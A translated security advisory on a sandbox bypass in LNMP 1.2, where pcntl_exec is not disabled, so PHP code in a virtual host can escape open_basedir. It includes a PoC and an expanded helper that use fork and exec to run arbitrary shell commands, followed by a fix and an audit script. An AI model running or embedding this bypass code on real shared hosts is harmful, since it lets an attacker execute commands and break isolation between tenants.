LNMP Virtual Host PHP Sandbox Bypass / Command Execution (after the PHP exec functions are disabled)

Source: Internet
Author: User

LNMP Virtual Host PHP sandbox bypass/Command execution

LNMP has been updated to version 1.2 and a lot of things have been upgraded, which is great. However, a bug was found.

LNMP is a one-click installation package for Nginx, PHP and MySQL on Linux.

Download: http://soft.vpser.net/lnmp/lnmp1.2.tar.gz

The whole stack can be installed with a single command.

Vulnerability Details

LNMP sets up its sandbox with two mechanisms:

    1. disable_functions, configured in include/php.sh.

The value is:

    passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,fsocket

(Two entries in that list, popepassthru and fsocket, are not PHP function names and therefore disable nothing.)

    2. open_basedir, configured when a virtual host is created.

The method is to create a .user.ini file in the virtual host's directory, set open_basedir in that INI file, and then run chattr +i on it so that it cannot be modified.

But if PHP can execute system commands, open_basedir is meaningless: a spawned process is not subject to it at all.

Now look at the options LNMP compiles PHP with:

--enable-pcntl is present, an option that a default PHP build does not enable.

Looking back at the disable_functions list above, pcntl_exec is not disabled. I do not know why this version removed pcntl_exec from the list, but the result is that the virtual host sandbox can be bypassed and arbitrary commands executed.

Here is how to execute a command with pcntl_exec.

pcntl_exec replaces the current process image with the given program, in the manner of execve(). It is similar in spirit to Shell.Application on Windows: we write a script file and then execute it.

The PoC is as follows:

    <?php
    header("Content-type: text/plain");
    $cmd = "/tmp/exec";
    @unlink($cmd);
    @unlink("/tmp/output");
    // Wrapper script: runs the command and redirects its output to /tmp/output
    $c = "#!/usr/bin/env bash\nuname -a >/tmp/output\n";
    file_put_contents($cmd, $c);
    chmod($cmd, 0777);
    switch (pcntl_fork()) {
        case 0:
            // Child: replace this process with the wrapper script
            $ret = pcntl_exec($cmd);
            exit($ret);
        default:
            // Parent (the PHP-FPM worker): answer the request as usual
            echo "Case 1";
            break;
    }

The PoC writes a shell script that runs the command and writes its output to /tmp/output.

Then pcntl_fork() forks a child process, and pcntl_exec is called in that child to execute the script. Calling pcntl_exec directly in the parent would replace the PHP-FPM worker process itself, so the request would never be answered and Nginx would return a 502.

Then read the output:

    echo file_get_contents("/tmp/output");
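The same fork-and-exec technique carried through in one request, as an added example that is not the original PoC: the parent waits for the child with pcntl_waitpid() before reading the output file, which removes the race between the child finishing and the file being read. The paths match the PoC above; the command and the helper name runViaPcntlExec are assumptions for the demonstration. Note that file_put_contents() is still subject to open_basedir, so the wrapper has to be written to a directory the vhost is allowed to write to; the exec itself is not constrained by open_basedir.

```php
<?php
// Added example (not from the original post): fork + pcntl_exec with the
// parent waiting for the child, so the command's output is returned in the
// same request. Paths follow the original PoC; the command is arbitrary.
header('Content-type: text/plain');

/**
 * Run a shell command via pcntl_fork() + pcntl_exec() and return its output.
 * $dir must be writable and inside open_basedir for file_put_contents();
 * /tmp is assumed, as in the original PoC.
 */
function runViaPcntlExec(string $command, string $dir = '/tmp'): string
{
    $wrapper = $dir . '/exec';
    $output  = $dir . '/output';
    @unlink($wrapper);
    @unlink($output);

    // The command and its redirection live inside the wrapper script, so
    // pcntl_exec() only needs a single path and no argument array.
    file_put_contents(
        $wrapper,
        "#!/usr/bin/env bash\n" . $command . " >" . $output . " 2>&1\n"
    );
    chmod($wrapper, 0700);

    $pid = pcntl_fork();
    if ($pid === -1) {
        return "fork failed\n";
    }
    if ($pid === 0) {
        // Child: replace this process image with the wrapper. On success
        // pcntl_exec() never returns; on failure exit immediately so the
        // child never continues into the parent's request handling.
        pcntl_exec($wrapper);
        exit(127);
    }

    // Parent (the PHP-FPM worker): block until the child has exited, then
    // read what it wrote. Doing pcntl_exec() here instead would replace the
    // worker itself and the request would end in a 502.
    $status = 0;
    pcntl_waitpid($pid, $status);
    @unlink($wrapper);

    $result = @file_get_contents($output);
    @unlink($output);
    if ($result === false) {
        return "no output (child exit status " . pcntl_wexitstatus($status) . ")\n";
    }
    return $result;
}

echo runViaPcntlExec('id; uname -a');
```

Because the parent only waits, the request takes as long as the command does; for long-running commands the original fire-and-forget form (echo in the parent, read /tmp/output on a later request) is the one to use.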

Arbitrary commands can be executed, the sandbox is bypassed, and the isolation between virtual hosts is meaningless.

Solution

Add pcntl_exec (and the rest of the pcntl_* functions) to disable_functions, or do not compile PHP with --enable-pcntl.
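A script to check whether a given PHP configuration still has this gap, added here as an example and not part of LNMP or the original post. It reads the effective disable_functions, classifies each function from LNMP's list and from the pcntl extension as disabled, not compiled in, or still callable, and prints a hardened disable_functions value. The pcntl function list and the helper names (parseDisableFunctions, auditDisableFunctions) are assumptions for the example.

```php
<?php
// Added example, not part of the original post or of LNMP: audit the running
// PHP configuration for the pcntl gap and print a hardened disable_functions
// line. Run it under the same php.ini as the virtual host (drop it in the
// docroot and request it), or from the CLI with the FPM ini, e.g.
//   php -c /usr/local/php/etc/php.ini audit.php

// LNMP 1.2's list from include/php.sh (popepassthru and fsocket are kept
// for comparison; they are not PHP function names and disable nothing).
$lnmpList = 'passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,'
    . 'proc_open,proc_get_status,popen,ini_alter,ini_restore,dl,openlog,'
    . 'syslog,readlink,symlink,popepassthru,stream_socket_server,fsocket';

// Process-control functions that turn "no exec" back into "exec".
// Assumption: the full pcntl function set, not only pcntl_exec/pcntl_fork.
$pcntlList = 'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,'
    . 'pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,'
    . 'pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,'
    . 'pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,'
    . 'pcntl_exec,pcntl_getpriority,pcntl_setpriority';

/** Split a disable_functions value into a set of lower-cased names. */
function parseDisableFunctions(string $value): array
{
    $names = array_filter(array_map('trim', explode(',', strtolower($value))));
    return array_fill_keys($names, true);
}

/**
 * Classify each wanted function. The ini list is consulted first because
 * function_exists() returns false both for functions disabled through
 * disable_functions and for functions that were never compiled in.
 */
function auditDisableFunctions(array $wanted, array $disabled): array
{
    $report = [];
    foreach ($wanted as $fn) {
        if (isset($disabled[$fn])) {
            $report[$fn] = 'disabled';
        } elseif (function_exists($fn)) {
            $report[$fn] = 'CALLABLE';
        } else {
            $report[$fn] = 'not compiled in';
        }
    }
    return $report;
}

$wanted   = array_unique(explode(',', $lnmpList . ',' . $pcntlList));
$disabled = parseDisableFunctions((string) ini_get('disable_functions'));
$report   = auditDisableFunctions($wanted, $disabled);

header('Content-type: text/plain');
printf("pcntl extension loaded: %s\n", extension_loaded('pcntl') ? 'yes' : 'no');
printf("open_basedir: %s\n\n", ini_get('open_basedir') ?: '(not set)');
foreach ($report as $fn => $status) {
    printf("%-24s %s\n", $fn, $status);
}

// Anything still callable is appended to the existing list; the result is
// the value to put in include/php.sh (or php.ini) as disable_functions.
$callable = array_keys($report, 'CALLABLE', true);
if ($callable) {
    $hardened = array_keys($disabled + array_fill_keys($callable, true));
    printf("\nStill callable: %s\n", implode(',', $callable));
    printf("disable_functions = %s\n", implode(',', $hardened));
} else {
    echo "\nNothing left to disable.\n";
}
```

disable_functions is a system-level (PHP_INI_SYSTEM) directive, so the hardened value has to go into php.ini, which is what LNMP's php.sh writes; it cannot be set per virtual host from the .user.ini that carries open_basedir.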

